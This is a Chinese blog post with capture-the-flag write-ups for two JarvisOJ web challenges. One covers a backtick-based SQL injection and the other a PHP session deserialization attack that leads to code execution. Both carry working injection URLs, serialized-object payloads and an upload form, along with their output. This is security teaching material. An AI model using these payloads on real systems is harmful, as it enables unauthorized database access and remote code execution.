jarvisoj Inject & PHPINFO

最新推荐文章于 2020-05-06 01:18:25 发布
最新推荐文章于 2020-05-06 01:18:25 发布
阅读量503 收藏 1
点赞数
分类专栏: web攻防 ctf-web 文章标签: jarvisoj PHPINFO Inject
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20307987/article/details/88813332
版权

Jarvisoj

Inject

扫描后台得到index.php~

<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>

可以看到,首先要满足第一个SQL语句的语法,并在第二个SQL语句内实现注入。
经过试验,desc后面可以跟表名,表明必须要正确,例如desc user

在构造语句的过程中发现,后面还可以跟反引号括起来的内容,例如desc user aaa,查资料发现这样写的结果是,语句正常执行,aaa作为user表的别名。那么在这道题目中就可以保证第一个sql语句正常执行,不跳到Hacker()函数,通过这种形式就可以构造第二个sql语句完成注入的目的。

Payload(这里过滤了单引号和双引号,所以涉及到知识点用十六进制表示表名)
http://web.jarvisoj.com:32794/index.php?table=test`%20`union%20select%20database()%20limit%201,1
61d300 
secret_flag
http://web.jarvisoj.com:32794/index.php?table=test`%20`union%20select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7365637265745f666c6167%20limit%201,1
flagUwillNeverKnow 
http://web.jarvisoj.com:32794/index.php?table=test`%20`union%20select%20flagUwillNeverKnow%20from%20secret_flag%20limit%201,1
flag{luckyGame~}

PHPINFO
**

seesion的反序列化问题
session.upload_progress.enabled为On
通过Session Upload Progress来设置session

**
这个漏洞如果要触发,则需要在服务器中写入一个使用php_serialize序列话的值,然后访问index.php时就会被php的引擎反序列化

可以发现其为序列化之后的内容,当浏览器带着sessionid再次访问脚本时,服务器端根据sessionid读取session文件并将其反序列化.

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

加参数phpinfo可以看到phpinfo配置
Php序列化及反序列化处理器
Php在session存储和读取时,都会有一个序列化和反序列化的过程,反序列化中会调用对象的magic方法,比如__destruct(),__wakeup()等
Php的魔术方法

Php内置了多种处理器用于存取$_SESSION数据,都会对数据进行序列化和反序列化。
---------------------------------------------------------------------------------------
处理器                      |对应存储的序列化字符串
---------------------------------------------------------------------------------------
php                        |name|s:8:"xiaoming";passwd|s:6:"123456";
php_binary                 |names:8:"xiaoming";passwds:6:"123456";
php_serialize (php>=5.5.4) |a:2:{s:4:"name";s:8:"xiaoming";s:6:"passwd";s:6:"123456";}
---------------------------------------------------------------------------------------

Php服务器端session的存放形式,客户端的Cookie在服务端会是一个什么样的存在和处理过程,这个session文件中存储的信息是什么样的。

比如http://10.11.11.11/test.php有如下代码:
<?php
    session_start();
    $name = $_GET['name'];
    $passwd = $_GET['passwd'];
    $_SESSION['name'] = $name;
    $_SESSION['passwd'] = $passwd;
?>

那么在服务器就会生成类似sess_998dhc9e4k08reqi47bovvu6coj1aj1f这样名字的文件,里面存储的session的信息。
比如在访问使用参数是name=admin&passwd=admin
存放的session信息是name|s:5:“admin”;passwd|s:5:“admin”;,可以看到,这里存放了序列化以后的字符串。会不会找到服务的session.save_path然后来读取明文字符串?

如果PHP在反序列化存储的SESSION数据时使用的处理器和序列化时使用的处理器不同,可能会导致数据无法正确反序列化,经过构造甚至可以执行代码

Session.upload_progress.enabled,当它为开启状态时,PHP能够在每一个文件上传时检测上传进度。
当在一个上传处理中,同时POST一个与php.ini中设置的session.upload_progress.name同名变量时,上传进度就可以在$_SESSION中获得。
当PHP检测到这种POST请求时,它会在$_SESSION中添加一组数据,索引是session.upload_progress.prefix与session.upload_progress.name连接在一起的值。

那么这道题目就容易理解了,解题过程如下:

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

<?php
ini_set('session.serialize_hander','php_serialize');
session_start();
class OowoO
{
	public $mdzz='print_r(dirname(__FILE__));'
	//public $mdzz='print_r(scandir(dirname(__FILE__)));';
	//public $mdzz='print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));';
	//O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";}
}

$obj = new OowoO();
echo serialize($obj)
?>

payload:
public $mdzz='print_r(dirname(__FILE__));'
/opt/lampp/htdocs

|O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

(
    [0] => .
    [1] => ..
    [2] => Here_1s_7he_fl4g_buT_You_Cannot_see.php
    [3] => index.php
    [4] => phpinfo.php
)

print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));


|O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";}
R_1v3r
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHPINFO(jarvisoj)
Mikasa
04-19 820
今天做题的时候做了这一道。。刷新了对反序列化的认识。。 这道题考察了关于session序列化选择器的漏洞。。 参考文章:https://www.jb51.net/article/107101.htm 首先先介绍一下,关于session反序列化的三种机制: 首先在php.ini中关于session的设置: session.save_path="" #设置session的储存路径 sess...
Jarvis OJ /inject
沐目的博客
10-15 277
Jarvis OJ /inject 感觉SQL注入挺重要的,也算是比较基础的东西,而且经常写题会遇到。所以就打算每次遇到一些新的东西,或者忘了的东西,就记录一下。也会记录一些数据库的知识,毕竟SQL注入和数据库是分不开的。 一.MySQL数据排序asc、desc 1.asc 这个就是把查询到的数据,从小到大的排列,当然,这也是默认的排解方式。像这个是没有加任何其他东西的查找。 mysql&gt...
Jarvis OJ inject(反引号注入)
wywwzjj
02-22 829
http://web.jarvisoj.com:32794/index.php~ 得到源码 &amp;amp;amp;amp;amp;lt;?php require(&amp;amp;amp;amp;quot;config.php&amp;amp;amp;amp;quot;); $table = $_GET['table']?$_GET['table']:&amp;amp;amp;amp;quot;test&amp;amp;amp;amp;quot;;
Jarvis OJ WEB PHPINFO
A_dmin的博客
04-13 446
Jarvis OJ WEB PHPINFO session反序列化的题目,很少做,貌似也不会,这里记一下 打开题目可以得到源码: <?php //A webshell is wait for you ini_set('session.serialize_handler', 'php'); session_start(); class OowoO { public $mdzz; ...
Jarvis OJ PHPINFO
沐目的博客
08-12 332
1.知识点 1.1php处理器 PHP内置了三个处理器,用来对session进行序列化和反序列化。在php 5.5.4以前默认选择的是php,5.5.4之后就是php_serialize,这里面是php_serialize。 php处理器: PHP php_binary php_serialize (php>=5.5.4) 1.2反序列化漏洞 这个配置可以在php.ini文件中的“se...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
InjectDLL_injectDll_
10-04
Usage: injectdll.exe [process name] [dll path] [option number]option 1 - CreateRemoteThreadoption 2 - NtCreateThreadExoption 3 - RtlCreateUserThread
cookies & inject browser下载.txt
02-17
### Cookies与Inject Browser工具下载及应用详解 #### 一、Cookies简介 Cookies是Web服务器存储在用户本地终端上的数据(通常经过加密),是HTTP协议的一部分,由用户客户端软件(通常是浏览器)保存。Cookies的...
vue中的inject学习教程
10-17
这时,Vue提供了`provide`和`inject`这对选项,用于祖孙组件间的通信。 `provide`和`inject`允许一个祖先组件向其所有子孙后代注入依赖,无论组件层级多深,只要它们之间存在上下级关系,就能保持通信的有效性。`...
RemoteDll.rar_dll inject
09-14
标题 "RemoteDll.rar_dll inject" 暗示了这是一个关于远程动态链接库(DLL)注入的技术,这在IT行业中是一种常见的系统和程序交互方法。DLL注入通常被用于调试、插件开发、性能监控,但同时也可能被滥用进行恶意活动...
Jarvisoj_Simple Injection
一只迂腐子
03-04 1483
Simple Injection - 167 SOLVERS - 350 WEB 很简单的注入,大家试试? 题目入口:http://web.jarvisoj.com:32787/ 题目来源:ISCC2016 访问页面之后,得到就是一个登陆页面。通过burp进行抓包,发现在响应头或者是页面中含有提示信息,那么就说明这的确是一个普通的登陆型的SQL注入漏洞了。 常见的登陆漏洞类型 ...
Jarvis OJ Simple Injection
沐目的博客
05-10 542
Jarvis OJ Simple Injection 题目提示说是sql注入,一打开就是登陆界面,发现输入admin显示的是密码错误,输入其他的是用户名错误,绕后就想到了实验吧的一道题,“” ...
jarvisoj-web-inject
lb821756107的专栏
05-06 244
题目描述: 题目入口:http://web.jarvisoj.com:32794/ Hint1: 先找到源码再说吧~~ 知识点罗列: 1, SQL UNION 操作符合并两个或多个 SELECT 语句的结果。 2,select 执行另一个语句, select(if xxxxxxx) 3,len() 、 length()函数返回文本字段中值的长度。 4,在MySQL中,把 i...
171219 JarvisOJ(DebugMe)(1)
whklhhhh的博客
12-20 445
1625-5 王子昂 总结《2017年12月19日》 【连续第445天总结】 A. JarvisOJ-DebugMe B. JarvisOJ上的题…真是让人痛苦又快乐着,每题都挺难的,但是又能学到不少东西,但是WP难找真让人头疼OTZ强迫自己学习呀这是拖入IDA反编译,发现是Elf的动态链接库 所以动态调试就比较麻烦了(:з」∠)还要自己写个程序加载它main函数很直接,要求有2个参数
JarvisOJ web题目 [61dctf]inject 解题思路----mysql反引号与单引号的区别
__Curtain_
04-12 2408
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 &lt;?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
Jarvis OJ PHPINFO【审计代码反序列化】
Sp4rkW的博客
11-02 3951
原题地址:http://web.jarvisoj.com:32784/ 其实这题一开始是没有任何思路的,感觉不存在任何数据传输接收点,后来看到了一篇wp,点这里 感觉瞬间打开了新世界,,,这里写篇write up记录下做题过程 首先打开题目页面直接获得源码: &lt;?php //A webshell is wait for you ini_set('session.s...
jarvis oj api接口为例讲解xxe攻击
欢迎来到神林的博客
09-10 527
jarvis oj api接口为例讲解xxe攻击 xml基本介绍 xml被设计来进行数据的传输以及数据储存。xml文档结构包括: 其中xxe就是利用DTD中特意声明某种协议再用文档元素进行调用来实现攻击。 xml内外部元素 由于可以对DTD进行声明,我们有两种选择:内部实体声明: <!DOCTYPE note [<!ELEMENT noet (xxx)>]> 其中...
jarvisoj-web-wp
Iambangbang的博客
08-21 3547
Port51 这是一道pctf的原题,,显然要用公网ip端口进行访问,这时候用到了curl命令,使用curl –local-port http://web.jarvisoj.com:32770/就可以得到flag,但是貌似服务器出了点儿问题,所以不弹flag了 LOCALHOST ,这个题目和上面一道题目差不多,都很基础,用火狐的代理,直接就可以了, Login ,一开始进去没什么思
jarvis oj Web By Assassin
Assassin
08-22 8643
LOCALHOST套路题,构造headers中加上x-forwarded-for=127.0.0.1即可 PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}PORT51访问了页面发现让你Please use port 51 to visit this site.明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–l
vue中provide & inject
最新发布
07-10
Vue中的provide和inject是用于在组件之间进行属性传递的机制。 在父组件中,我们可以使用provide选项来定义我们想要传递给子组件的属性。provide选项是一个对象,其中的属性和值将会被传递给子组件。例如: ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值